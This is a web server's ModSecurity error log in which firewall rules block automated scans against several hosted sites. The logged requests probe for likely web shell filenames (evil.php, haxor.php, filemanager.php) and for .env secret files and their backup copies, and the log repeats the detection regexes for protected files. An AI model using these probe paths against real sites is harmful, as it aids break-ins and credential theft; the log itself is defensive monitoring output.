[Tue May 26 13:12:39.085779 2026] [security2:error] [pid 496740:tid 496884] [client 108.136.131.13:55597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/config.php"] [unique_id "ahVO7-vOeft4ltnLrH48kAAAAA4"]
[Tue May 26 13:12:39.085876 2026] [security2:error] [pid 496740:tid 496881] [client 108.136.131.13:55592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/content.php"] [unique_id "ahVO7-vOeft4ltnLrH48kQAAAAs"]
[Tue May 26 13:12:39.093457 2026] [security2:error] [pid 496740:tid 496993] [client 108.136.131.13:55594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/d.php"] [unique_id "ahVO7-vOeft4ltnLrH48kwAAAHs"]
[Tue May 26 13:12:39.110637 2026] [security2:error] [pid 496740:tid 496916] [client 207.241.173.38:43846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env"] [unique_id "ahVO7-vOeft4ltnLrH48rQAAAC4"]
[Tue May 26 13:12:39.115988 2026] [security2:error] [pid 496740:tid 496909] [client 207.241.173.38:43874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/api/.env"] [unique_id "ahVO7-vOeft4ltnLrH48rgAAACc"]
[Tue May 26 13:12:39.117129 2026] [security2:error] [pid 496740:tid 496919] [client 207.241.173.38:43886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/backend/.env"] [unique_id "ahVO7-vOeft4ltnLrH48owAAADE"]
[Tue May 26 13:12:39.118708 2026] [security2:error] [pid 496740:tid 496969] [client 207.241.173.38:43858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/app/.env"] [unique_id "ahVO7-vOeft4ltnLrH48pQAAAGM"]
[Tue May 26 13:12:39.513922 2026] [security2:error] [pid 496740:tid 496927] [client 108.136.131.13:56315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/dropdown.php"] [unique_id "ahVO7-vOeft4ltnLrH48xQAAADk"]
[Tue May 26 13:12:39.516863 2026] [security2:error] [pid 496740:tid 496992] [client 108.136.131.13:56302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/docindex.php"] [unique_id "ahVO7-vOeft4ltnLrH48xwAAAHo"]
[Tue May 26 13:12:39.518322 2026] [security2:error] [pid 496740:tid 496970] [client 108.136.131.13:56296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/db.php"] [unique_id "ahVO7-vOeft4ltnLrH48yAAAAGQ"]
[Tue May 26 13:12:39.523394 2026] [security2:error] [pid 496740:tid 496892] [client 108.136.131.13:56300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/doc.php"] [unique_id "ahVO7-vOeft4ltnLrH48ygAAABY"]
[Tue May 26 13:12:39.527311 2026] [security2:error] [pid 496740:tid 496888] [client 108.136.131.13:56298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/dev.php"] [unique_id "ahVO7-vOeft4ltnLrH48ywAAABI"]
[Tue May 26 13:12:39.956902 2026] [security2:error] [pid 496740:tid 496944] [client 108.136.131.13:56768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/error.php"] [unique_id "ahVO7-vOeft4ltnLrH482gAAAEo"]
[Tue May 26 13:12:39.958963 2026] [security2:error] [pid 496740:tid 496958] [client 108.136.131.13:56764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/e.php"] [unique_id "ahVO7-vOeft4ltnLrH482wAAAFg"]
[Tue May 26 13:12:39.965350 2026] [security2:error] [pid 496740:tid 496932] [client 108.136.131.13:56772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/exploit.php"] [unique_id "ahVO7-vOeft4ltnLrH483AAAAD4"]
[Tue May 26 13:12:39.975030 2026] [security2:error] [pid 496740:tid 496987] [client 108.136.131.13:56766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/eagle.php"] [unique_id "ahVO7-vOeft4ltnLrH483gAAAHU"]
[Tue May 26 13:12:39.975280 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:56769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/evil.php"] [unique_id "ahVO7-vOeft4ltnLrH483wAAAHc"]
[Tue May 26 13:12:40.401100 2026] [security2:error] [pid 496740:tid 496962] [client 108.136.131.13:57064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fierza.php"] [unique_id "ahVO8OvOeft4ltnLrH487AAAAFw"]
[Tue May 26 13:12:40.404399 2026] [security2:error] [pid 496740:tid 496949] [client 108.136.131.13:57063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fg.php"] [unique_id "ahVO8OvOeft4ltnLrH487QAAAE8"]
[Tue May 26 13:12:40.411486 2026] [security2:error] [pid 496740:tid 496874] [client 108.136.131.13:57057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/f0x.php"] [unique_id "ahVO8OvOeft4ltnLrH487gAAAAQ"]
[Tue May 26 13:12:40.412844 2026] [security2:error] [pid 496740:tid 496953] [client 108.136.131.13:57077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/file.php"] [unique_id "ahVO8OvOeft4ltnLrH487wAAAFM"]
[Tue May 26 13:12:40.414558 2026] [security2:error] [pid 496740:tid 496950] [client 108.136.131.13:57080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/f.php"] [unique_id "ahVO8OvOeft4ltnLrH488AAAAFA"]
[Tue May 26 13:12:40.814103 2026] [autoindex:error] [pid 496740:tid 496988] [client 207.241.173.38:43996] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:12:40.843207 2026] [security2:error] [pid 496740:tid 496905] [client 108.136.131.13:57241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fm1.php"] [unique_id "ahVO8OvOeft4ltnLrH49CQAAACM"]
[Tue May 26 13:12:40.845371 2026] [security2:error] [pid 496740:tid 496894] [client 108.136.131.13:57240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fm.php"] [unique_id "ahVO8OvOeft4ltnLrH49CwAAABg"]
[Tue May 26 13:12:40.845755 2026] [security2:error] [pid 496740:tid 496948] [client 108.136.131.13:57238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/filemanager.php"] [unique_id "ahVO8OvOeft4ltnLrH49CgAAAE4"]
[Tue May 26 13:12:40.852832 2026] [security2:error] [pid 496740:tid 496993] [client 108.136.131.13:57246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/foxx.php"] [unique_id "ahVO8OvOeft4ltnLrH49DQAAAHs"]
[Tue May 26 13:12:40.863940 2026] [security2:error] [pid 496740:tid 496885] [client 108.136.131.13:57239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/flame.php"] [unique_id "ahVO8OvOeft4ltnLrH49DwAAAA8"]
[Tue May 26 13:12:40.999943 2026] [security2:error] [pid 496740:tid 496947] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO8OvOeft4ltnLrH48-QAAAE0"]
[Tue May 26 13:12:41.216638 2026] [security2:error] [pid 496740:tid 496944] [client 207.241.173.38:43996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.copy"] [unique_id "ahVO8evOeft4ltnLrH49HAAAAEo"]
[Tue May 26 13:12:41.293419 2026] [security2:error] [pid 496740:tid 496986] [client 108.136.131.13:57425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fw.php"] [unique_id "ahVO8evOeft4ltnLrH49IwAAAHQ"]
[Tue May 26 13:12:41.295879 2026] [security2:error] [pid 496740:tid 496893] [client 108.136.131.13:57441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/gel4y.php"] [unique_id "ahVO8evOeft4ltnLrH49JAAAABc"]
[Tue May 26 13:12:41.296326 2026] [security2:error] [pid 496740:tid 496996] [client 108.136.131.13:57429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/fx.php"] [unique_id "ahVO8evOeft4ltnLrH49JQAAAH4"]
[Tue May 26 13:12:41.300288 2026] [security2:error] [pid 496740:tid 496985] [client 108.136.131.13:57436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/gecko.php"] [unique_id "ahVO8evOeft4ltnLrH49JgAAAHM"]
[Tue May 26 13:12:41.312885 2026] [security2:error] [pid 496740:tid 496931] [client 108.136.131.13:57435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/g.php"] [unique_id "ahVO8evOeft4ltnLrH49JwAAAD0"]
[Tue May 26 13:12:41.719417 2026] [security2:error] [pid 496740:tid 496971] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVO7-vOeft4ltnLrH480QAAAGU"]
[Tue May 26 13:12:41.740955 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:57579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/h.php"] [unique_id "ahVO8evOeft4ltnLrH49OQAAAFo"]
[Tue May 26 13:12:41.747696 2026] [security2:error] [pid 496740:tid 496871] [client 108.136.131.13:57581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/hello.php"] [unique_id "ahVO8evOeft4ltnLrH49OgAAAAE"]
[Tue May 26 13:12:41.750043 2026] [security2:error] [pid 496740:tid 496939] [client 108.136.131.13:57578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/green.php"] [unique_id "ahVO8evOeft4ltnLrH49OwAAAEU"]
[Tue May 26 13:12:41.752151 2026] [security2:error] [pid 496740:tid 496956] [client 108.136.131.13:57580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/haxor.php"] [unique_id "ahVO8evOeft4ltnLrH49PAAAAFY"]
[Tue May 26 13:12:41.752515 2026] [security2:error] [pid 496740:tid 496990] [client 108.136.131.13:57573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/gelay.php"] [unique_id "ahVO8evOeft4ltnLrH49PQAAAHg"]
[Tue May 26 13:12:42.182744 2026] [security2:error] [pid 496740:tid 496936] [client 108.136.131.13:57926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/hi.php"] [unique_id "ahVO8uvOeft4ltnLrH49WAAAAEI"]
[Tue May 26 13:12:42.184033 2026] [security2:error] [pid 496740:tid 496968] [client 108.136.131.13:57970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/id.php"] [unique_id "ahVO8uvOeft4ltnLrH49WQAAAGI"]
[Tue May 26 13:12:42.188698 2026] [security2:error] [pid 496740:tid 496870] [client 108.136.131.13:57974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/idx.php"] [unique_id "ahVO8uvOeft4ltnLrH49WgAAAAA"]
[Tue May 26 13:12:42.191937 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:57984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/if.php"] [unique_id "ahVO8uvOeft4ltnLrH49WwAAACY"]
[Tue May 26 13:12:42.197339 2026] [security2:error] [pid 496740:tid 496966] [client 108.136.131.13:57949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/i.php"] [unique_id "ahVO8uvOeft4ltnLrH49XAAAAGA"]
[Tue May 26 13:12:42.404798 2026] [security2:error] [pid 496740:tid 496976] [client 207.241.173.38:44294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.swp"] [unique_id "ahVO8uvOeft4ltnLrH49ZgAAAGo"]
[Tue May 26 13:12:42.405903 2026] [security2:error] [pid 496740:tid 496934] [client 207.241.173.38:44310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.orig"] [unique_id "ahVO8uvOeft4ltnLrH49ZwAAAEA"]
[Tue May 26 13:12:42.406835 2026] [security2:error] [pid 496740:tid 496931] [client 207.241.173.38:44238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.copy"] [unique_id "ahVO8uvOeft4ltnLrH49aAAAAD0"]
[Tue May 26 13:12:42.407489 2026] [security2:error] [pid 496740:tid 496889] [client 207.241.173.38:44282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local~"] [unique_id "ahVO8uvOeft4ltnLrH49aQAAABM"]
[Tue May 26 13:12:42.411049 2026] [security2:error] [pid 496740:tid 496897] [client 207.241.173.38:44248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.bak"] [unique_id "ahVO8uvOeft4ltnLrH49awAAABs"]
[Tue May 26 13:12:42.413091 2026] [security2:error] [pid 496740:tid 496911] [client 207.241.173.38:44260] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.old"] [unique_id "ahVO8uvOeft4ltnLrH49bAAAACk"]
[Tue May 26 13:12:42.414715 2026] [security2:error] [pid 496740:tid 496938] [client 207.241.173.38:44222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.orig"] [unique_id "ahVO8uvOeft4ltnLrH49bQAAAEQ"]
[Tue May 26 13:12:42.415319 2026] [security2:error] [pid 496740:tid 496906] [client 207.241.173.38:44204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env~"] [unique_id "ahVO8uvOeft4ltnLrH49bgAAACQ"]
[Tue May 26 13:12:42.417671 2026] [security2:error] [pid 496740:tid 496918] [client 207.241.173.38:44166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.bak"] [unique_id "ahVO8uvOeft4ltnLrH49cAAAADA"]
[Tue May 26 13:12:42.418455 2026] [security2:error] [pid 496740:tid 496929] [client 207.241.173.38:44180] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.old"] [unique_id "ahVO8uvOeft4ltnLrH49cQAAADs"]
